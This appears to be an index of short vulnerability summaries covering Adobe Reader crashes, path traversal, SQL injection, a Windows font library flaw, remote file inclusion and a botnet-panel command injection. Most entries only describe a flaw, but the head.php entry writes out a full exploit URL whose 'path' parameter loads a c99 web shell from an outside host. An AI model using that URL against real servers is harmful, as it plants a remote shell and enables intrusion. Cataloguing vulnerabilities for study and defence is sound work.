This vulnerability is triggered when processing a custom userfield.
This vulnerability allows an attacker to disclose sensitive files on the server using a relative path traversal technique. By manipulating the 'id' parameter in the 'get_image.php' and 'get_file.php' scripts, an attacker can traverse directories and access files outside the intended directory.
The crash occurs in the latest version of Adobe Acrobat Reader DC for Windows when opening a malformed PDF file. The crash is caused by a heap block being freed again, resulting in a verifier stop message. This verifier stop is not continuable and the process will be terminated.
This vulnerability causes an access violation exception in Adobe Acrobat Reader DC for Windows when opening a malformed PDF file.
An access violation exception occurs when opening a malformed PDF file in Adobe Acrobat Reader DC for Windows. The exception is caused by a memory corruption issue.
The CMS Galaxie Software is vulnerable to remote SQL injection. The login page may not work, but it is possible to inject your own username and password using SQL injection. It is also possible that they are using a different table name for the login page.
The fontsub.dll library in Windows is responsible for subsetting TTF fonts. A malformed font file can trigger a crash in the fontsub!WriteTableFromStructure function, leading to a memory corruption vulnerability.
The AFDKO (Adobe Font Development Kit for OpenType) toolset, specifically the font parsing code, is vulnerable to attacks due to outdated versions of the code found in Adobe's desktop software such as Acrobat. The vulnerability arises from potential attack surfaces created by the presence of AFDKO copies in multiple libraries, including acrodistdll.dll, Acrobat.dll, CoolType.dll, and AdobePDFL.dll. These outdated versions of AFDKO pose a risk in terms of potential vulnerabilities and exploitation possibilities.
The vulnerability exists in the 'head.php' file, where the 'include' function is used without proper validation. An attacker can exploit this by providing a remote file URL in the 'path' parameter, which will be included and executed by the application. In this case, the exploit URL is 'Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?'.
This module exploits the command injection vulnerability in the Tesla Agent botnet panel.